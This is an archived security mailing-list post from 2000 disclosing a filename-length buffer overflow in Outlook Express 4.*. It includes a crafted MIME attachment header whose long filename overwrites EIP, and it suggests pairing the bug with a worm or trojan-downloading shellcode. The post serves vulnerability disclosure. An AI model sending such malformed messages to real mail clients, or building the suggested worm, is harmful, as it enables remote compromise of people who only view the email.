|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
Subject: Overflow in Outlook Express 4.* - too long filenames with graphic format extension
From: Ultor (Ultor
HERT.ORG)Date: Fri May 12 2000 - 07:05:28 CDT
- Next message: Anonymous: "New Solaris root exploit for /usr/lib/lp/bin/netpr"
- Previous message: Richard M. Smith: "IE Domain Confusion Vulnerability is an Email problem also"
- Next in thread: Ron Moritz: "Eudora Sensitive to Long Filenames"
- Reply: Ron Moritz: "Eudora Sensitive to Long Filenames"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
==== APPLICATION AFFECTED
Outlook Express 4.* (5.* is not affected)
==== DESCRIPTION
All attached graphic files are automatically shown in the Outlook Express
while viewing the e-mail. The problem is that long filenames with *.jpg
*.bmp extension makes overflow if filename lenght is longer then 256
characters.
==== EXAMPLE
We need more than 267 characters to overwrite EIP cause of 'C:\TEMP' on the
begining of buffer. This makes little problem with exploitation. Here is
example of such e-mail
------=_NextPart_000_0008_01BF5479.70140740
Content-Type: text/plain;
name="hert.jpg"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
filename="AAAABBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.jpg"
------=_NextPart_000_0008_01BF5479.70140740--
EIP is overwriten here by 'BBBB'.
==== EXPLOITATION
It's little hard to exploit it cause buffer is addressed in addr with '00'
and we got 'C:\TEMP' which overwrites stack before our data. You will need
some tricks to exploit this. I believe this bug could be very dangerous if
connected somehow with worm cause you would only have to view the message to
run the exploit. Using shellcode which downloads trojan from some URL on the
affected machine would be interesting idea too.
Greeetz to HERT,Lam3rZ,TESO
----------------------
Mark Bialoglowy [Ultorhert.org] --- Network Security Consultant
Age: 19 -- Country: PL -- PGP: http://www.hert.org/pgp/Ultor.asc
CODE: C / Delphi / w32asm / Linux / SQL / CGI / HTML / VRML / AI
----------------------
attached mail follows:
- message/rfc822 attachment: crash_oe.eml
- Next message: Anonymous: "New Solaris root exploit for /usr/lib/lp/bin/netpr"
- Previous message: Richard M. Smith: "IE Domain Confusion Vulnerability is an Email problem also"
- Next in thread: Ron Moritz: "Eudora Sensitive to Long Filenames"
- Reply: Ron Moritz: "Eudora Sensitive to Long Filenames"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]